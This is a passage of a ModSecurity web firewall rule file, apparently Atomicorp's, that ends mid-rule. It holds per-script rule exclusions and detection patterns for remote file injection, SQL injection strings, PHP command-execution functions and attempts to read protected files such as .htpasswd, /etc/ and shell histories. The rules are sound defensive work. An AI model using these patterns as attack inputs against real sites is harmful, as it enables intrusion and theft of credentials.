SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^func_key/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:360664,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91699

SecRule REQUEST_FILENAME "/cacti/data_input\.php" "phase:2,id:91700,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cgi-bin/bmailercp\.cgi" "phase:2,id:91701,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/wp-admin/admin\.php" "phase:2,id:91702,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340195,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028"

SecRule REQUEST_FILENAME "/control_panel\.php" "phase:2,id:91703,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:91704,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340159"
SecAction "phase:2,id:91705,t:none,pass,nolog,skipAfter:END_RULES_91705"

SecRule ARGS|XML:/*|!ARGS:data|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:content  "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|(?:execute|convert)\(|; ?delete.*;(?:insert|declare|varchar)|and .* \( ?select |(?:drop|create)(\w+)table|(?:declare|convert) .* varchar\(|null ?, ?(?:null ?, ?(?:accesslevel|user_name)) ?,|concat\(|union select |union all select|\b\W*?cast\b\W*?\(.* as |xecresultset|' ?; ?declare\b\W*?|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)"                 "phase:2,deny,log,auditlog,status:403,capture,id:360665,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:28,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch"

SecMarker END_RULES_91705

SecRule REQUEST_FILENAME "/css/gallery-css\.php" "phase:2,id:91706,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/rcv_paypal\.php" "phase:2,id:91707,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095"
SecAction "phase:2,id:91708,t:none,pass,nolog,skipAfter:END_RULES_91708"

SecRule ARGS|!ARGS:/item_name/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:message|!ARGS:email|!ARGS:/description/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|serialize|php_uname|phpinfo|preg_\w+|shell_exec|exec|eval|create_function|system) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:360666,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP attack in Argument',logdata:'%{TX.0}'"

SecMarker END_RULES_91708

SecRule REQUEST_FILENAME "/upload_crop\.php" "phase:2,id:91709,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/admin/generic_edit\.php" "phase:2,id:91710,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/edit_workshops\.php" "phase:2,id:91711,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126"
SecAction "phase:2,id:91712,t:none,pass,nolog,skipAfter:END_RULES_91712"

SecRule ARGS|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:message|!ARGS:email|!ARGS:/description/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|preg_\w+|shell_exec|exec|system) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:360667,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP attack in Argument',logdata:'%{TX.0}'"

SecMarker END_RULES_91712

SecRule REQUEST_FILENAME "/collect_db\.php" "phase:2,id:91713,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/a__iiconcreatelive\.php" "phase:2,id:91714,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91715,t:none,pass,nolog,skipAfter:END_RULES_91715"

SecRule ARGS|!ARGS:contentfrom "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:360668,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:contentfrom "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:360669,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91715

SecRule REQUEST_FILENAME "/etc/get_testimonial\.php" "phase:2,id:91716,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/_vti_bin/_vti_aut/author\.exe" "phase:2,id:91717,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390709"
SecAction "phase:2,id:91718,t:none,pass,nolog,skipAfter:END_RULES_91718"


#Protected file upload protection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/* "@pm .www_acl .htpasswd .htaccess boot.ini httpd.conf /etc/ .htgroup .wwwacl .history .bash_history" "id:333851,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334397,t:none,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_SPEC_1"

SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:tiny_vals|!ARGS:/description/|!ARGS:content|!ARGS:/keyword/|!ARGS:/desc/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/search/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:/data/ "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|httpd\.conf|boot\.ini)\b|\/etc\/|/\.(?:history|bash_history|sh_history)$)" "phase:2,deny,status:403,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'360670',rev:14,logdata:'%{TX.0}',severity:'2'"

SecRule REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|httpd\.conf|boot\.ini)\b|\/etc\/|/\.(?:history|bash_history|sh_history)$)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'360671',rev:6,logdata:'%{TX.0}',severity:'2'"

#
SecMarker END_FILE_PROTECTION_SPEC_1

SecMarker END_RULES_91718

SecRule REQUEST_FILENAME "/admin/reclame\.php" "phase:2,id:91719,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/install/itron\.php" "phase:2,id:91720,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/editcode\.php" "phase:2,id:91721,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/query_highlighted_block\.php" "phase:2,id:91722,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91723,t:none,pass,nolog,skipAfter:END_RULES_91723"

SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:360672,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:360673,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91723

SecRule REQUEST_FILENAME "/query_block_highlight\.php" "phase:2,id:91724,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91725,t:none,pass,nolog,skipAfter:END_RULES_91725"

SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:360674,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:360675,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91725

SecRule REQUEST_FILENAME "/query_block\.php" "phase:2,id:91726,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91727,t:none,pass,nolog,skipAfter:END_RULES_91727"

SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:360676,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:theme|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:360677,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91727

SecRule REQUEST_FILENAME "/shopadmin/index\.php" "phase:2,id:91728,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cms/rss\.php" "phase:2,id:91729,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/cms-edit\.php" "phase:2,id:91730,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/manufacturers\.php" "phase:2,id:91731,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/eventaddaction\.php" "phase:2,id:91732,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/settings/customerror" "phase:2,id:91733,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/edit_design\.php" "phase:2,id:91734,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/api\.php" "phase:2,id:91735,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/editresult_listing\.php" "phase:2,id:91736,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/products_product_process\.php" "phase:2,id:91737,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin_prod\.php" "phase:2,id:91738,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/editproperty_process\.php" "phase:2,id:91739,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sections_process\.php" "phase:2,id:91740,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sg_saveentry\.php" "phase:2,id:91741,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/admin_content_config\.php" "phase:2,id:91742,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/credit_log2\.php" "phase:2,id:91743,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/folio-edit\.php" "phase:2,id:91744,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:91745,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:91746,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340814,ctl:ruleRemovebyID=340813,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:91747,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/flvprovider\.php" "phase:2,id:91748,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/subscribe_user2group\.php" "phase:2,id:91749,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/editcontent_process\.php" "phase:2,id:91750,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/select_category\.php" "phase:2,id:91751,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/acp/options\.php" "phase:2,id:91752,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"

SecRule REQUEST_FILENAME "/editroster\.php" "phase:2,id:91753,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/process\.php" "phase:2,id:91754,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91755,t:none,pass,nolog,skipAfter:END_RULES_91755"

SecRule REQUEST_URI|ARGS|!ARGS:fu|!ARGS:/text/|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cforms/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:theme|!ARGS:returnBond|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:media|!ARGS:parent_name|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:/blog/|!ARGS:/video/|!ARGS:/^field1/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:importremote|!ARGS:/callback/|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:akID[46][value]|!ARGS:setmedia|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:/callback/|!ARGS:subject|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:search_string|!ARGS:direct|!ARGS:yt_thumb|!ARGS:fflv|!ARGS:direct|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:user_mail_register_no_approval_required_body|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!AR